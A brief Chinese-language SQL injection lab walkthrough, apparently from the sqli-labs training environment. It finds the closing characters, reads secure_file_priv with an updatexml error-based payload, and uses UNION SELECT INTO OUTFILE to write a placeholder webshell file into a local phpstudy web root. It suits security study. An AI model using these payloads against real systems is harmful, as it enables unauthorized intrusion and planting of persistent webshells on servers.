0、初始页面


1、确定闭合字符
确定闭合字符为单引号括号括号 '))
?id=1 and 1=1 
?id=1 and 1=2
?id=1'
?id=1'))
2、查看securie_file_priv参数
?id=1')) and upddatexml(1,concat(0x7e,(select @@secure_file_priv),0x7e),1) --+
3、写入一句话木马
?id=1')) union select null,"One sentence Trojan horse",null into outfile "C:/Users/wym/Desktop/phpstudy_pro/WWW/test.php" --+












![[000-01-025].第07节:WorkBench](https://i-blog.csdnimg.cn/direct/aac292dbb9e143bfb1ed6e3217fed953.png)







